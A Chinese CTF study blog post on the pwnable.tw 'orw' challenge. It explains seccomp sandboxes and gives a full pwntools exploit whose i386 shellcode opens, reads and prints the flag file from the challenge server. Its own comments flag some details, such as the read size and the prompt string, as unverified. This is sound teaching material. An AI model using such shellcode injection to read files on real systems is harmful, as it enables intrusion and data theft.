
PWN study 0x04|pwnable.tw 上的 orw

Posted by Elli0t on 2020-05-06
  • seccomp sandbox

    • 通过 seccomp 给进程加入沙箱:先用 seccomp_init() 设定默认动作(例如 SCMP_ACT_KILL),再用 seccomp_rule_add() 按系统调用号逐条禁用/允许某些系统调用,最后 seccomp_load() 把过滤器装入内核。过滤器一旦装入就不能撤销,并且会被子进程继承
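      /*
       * Install a seccomp-bpf sandbox on the calling process.
       *
       * seccomp_init() fixes the DEFAULT action for every syscall.  With
       * SCMP_ACT_KILL and no seccomp_rule_add() calls, the filter kills the
       * process on its very first syscall; a usable orw sandbox must add
       * SCMP_ACT_ALLOW rules for open/read/write (and an exit syscall) before
       * seccomp_load().  A KILL rule for execve, as in the commented-out line,
       * is redundant under a KILL default -- it only makes sense with an ALLOW
       * default (blacklist).  Once loaded the filter cannot be removed and is
       * inherited by child processes.
       *
       * Failing to install the filter must be fatal: if the caller carried on,
       * it would jump to the shellcode completely unsandboxed.
       */
      void load_seccomp(){
          scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_KILL);   /* default action */
          if (!ctx)
              __builtin_trap();
          //seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(execve), 0);
          if (seccomp_load(ctx) < 0)   /* was "sccomp_load" -- a typo that would not link */
              __builtin_trap();
          seccomp_release(ctx);        /* filter now lives in the kernel; free the context */
      }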

      /* Fragment of the caller (its enclosing function is not shown):
         read attacker-controlled bytes, install the sandbox, then jump to them. */
      printf("Your Shellcode >>");   // NOTE(review): the exp below waits for "Give my your shellcode:" -- verify the real prompt
      read(0, buffer, 0x10);   // raw, untrusted input copied verbatim; 0x10 bytes is far less than the orw payload assembled below -- confirm the real read size in a disassembler
      function shellcode = (function)buffer;   // pseudo-code: reinterpret the buffer as a function pointer (presumably the buffer is mapped executable)
      load_seccomp();   // the filter is installed AFTER the read and BEFORE the jump, so the payload only ever runs under the sandbox
      shellcode();   // from here on any syscall without an ALLOW rule kills the process (default action is SCMP_ACT_KILL)
    • 通过 seccomp-tools 来查看沙箱的信息(例如 seccomp-tools dump ./orw,可以直接看到过滤器允许/禁止了哪些系统调用)
      seccomp
  • orw 是 open、read、write 的简写

    • 有时候 binary 会通过 prctl、seccomp 进行沙箱保护,execve 之类的系统调用被禁用,并不能 getshell。只能通过 orw 的方式拿到 flag
    • fd = open("./flag", O_RDONLY); # 打开 flag 文件,得到 fd(flags 传 0 即 O_RDONLY;本题的真实路径是 /home/orw/flag,见下文)
    • read(fd,buf,0x30); # 通过 fd 将 flag 的内容读到内存中,返回值是实际读到的字节数
    • write(1,buf,0x30); # 将内存中的 flag 内容输出到屏幕🖥(更稳妥的做法是用 read 的返回值做长度,避免把 flag 之后的内存内容一起打印出来)

demo

题目:https://pwnable.tw/challenge/#2

demo

╭─root@97b3a7509c5a /pwn/freebuf/orw
╰─# python
Python 2.7.12 (default, Apr 15 2020, 17:07:12)
[GCC 5.4.0 20160609] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from pwn import *
>>> map(hex,unpack_many("/home/orw/flag  "))  # 末尾补两个空格凑够 16 字节:unpack_many 要求长度是字长(4 字节)的整数倍
['0x6d6f682f', '0x726f2f65', '0x6c662f77', '0x20206761']
>>>'6d6f682f'.decode('hex')
'moh/'
>>> '726f2f65'.decode('hex')
'ro/e'
>>> '6c662f77'.decode('hex')
'lf/w'
>>> '20206761'.decode('hex')
' ga'
>>>

exp:

from pwn import *
import time

# --- run-time configuration ---------------------------------------------------
# The target is a 32-bit binary, so asm() has to emit i386 code; the terminal
# setting is only used by gdb.attach(), and log_level='debug' dumps every
# byte sent and received on the wire.
context.update(
    arch='i386',                    # Don't forget !!!
    log_level='debug',
    terminal=["tmux", "sp", "-h"],
)

DEBUG = 0                           # truthy -> gdb.attach() the local process before sending
LOCAL = True                        # set to False when a command-line argument selects the remote target
BIN = './orw'
HOST = 'chall.pwnable.tw'
PORT = 10001

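# Payload: open("/home/orw/flag", O_RDONLY) -> read(fd, esp, 0x30)
#          -> write(1, esp, bytes_read) -> exit(0)
# Only these syscalls are needed, which is why an orw payload survives a
# seccomp filter that blocks execve.
#
# The path is pushed onto the stack as little-endian dwords.  It is padded
# with two spaces so unpack_many() gets a multiple of 4 bytes; the top push
# (0x00006761) also supplies the NUL terminator:
#   >>> map(hex, unpack_many("/home/orw/flag  "))
#   ['0x6d6f682f', '0x726f2f65', '0x6c662f77', '0x20206761']
#
# i386 syscall ABI: eax = number, ebx/ecx/edx = arg1..arg3, int 0x80,
# result (or negative errno) in eax.

shellcode = '''
xor eax, eax;
xor ebx, ebx;
xor ecx, ecx;          # open flags = 0 = O_RDONLY
xor edx, edx;          # mode, unused for O_RDONLY

push 0x00006761;       # "ag\\0\\0"  -- NUL terminator included
push 0x6c662f77;       # "w/fl"
push 0x726f2f65;       # "e/or"
push 0x6d6f682f;       # "/hom"    -- esp now points at "/home/orw/flag"

mov eax, 5;            # SYS_open
mov ebx, esp;          # filename
int 0x80;              # eax = fd (negative on failure)

mov ebx, eax;          # fd
mov ecx, esp;          # buf = esp; the path string is no longer needed and is overwritten
mov edx, 0x30;         # count -- the flag must fit in 0x30 bytes
mov eax, 3;            # SYS_read
int 0x80;              # eax = bytes actually read

mov edx, eax;          # write only what was read, not 0x30 bytes of stack
mov ebx, 1;            # fd = stdout
mov ecx, esp;          # buf = esp
mov eax, 4;            # SYS_write
int 0x80;

xor ebx, ebx;          # status 0
mov eax, 1;            # SYS_exit: leave cleanly instead of running off the end of the
int 0x80;              #   buffer; the filter must allow exit (check with seccomp-tools dump)
'''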

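def exploit(sh):
    """Deliver the orw payload over the pwntools tube `sh` and go interactive.

    Waits for the binary's prompt, assembles `shellcode` for the configured
    arch and sends it with send() rather than sendline(): the binary jumps
    into the buffer as-is, so a trailing "\\n" would sit in executable memory
    right after the payload as a stray opcode byte.  The assembled size is
    logged because it has to fit the binary's read() length.  Returns None;
    the flag appears in the interactive session.
    """
    sh.recvuntil('Give my your shellcode:')
    payload = asm(shellcode)
    log.info('shellcode is %d bytes' % len(payload))
    sh.send(payload)
    sh.interactive()
    return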

if __name__ == '__main__':
    # Any command-line argument selects the remote target; with none, the
    # local binary is spawned (under gdb when DEBUG is truthy).
    elf = ELF(BIN)                      # not referenced below; kept so the binary is parsed as before
    LOCAL = len(sys.argv) <= 1
    if not LOCAL:
        sh = remote(HOST, PORT)
    else:
        sh = process(BIN)
        log.info('PID: ' + str(proc.pidof(sh)[0]))   # for attaching a debugger by hand
        # pause
        if DEBUG:
            gdb.attach(sh)
    exploit(sh)
参考链接

https://github.com/david942j/seccomp-tools
seccomp工具
https://pwntools-docs-zh.readthedocs.io/zh_CN/latest/util/packing.html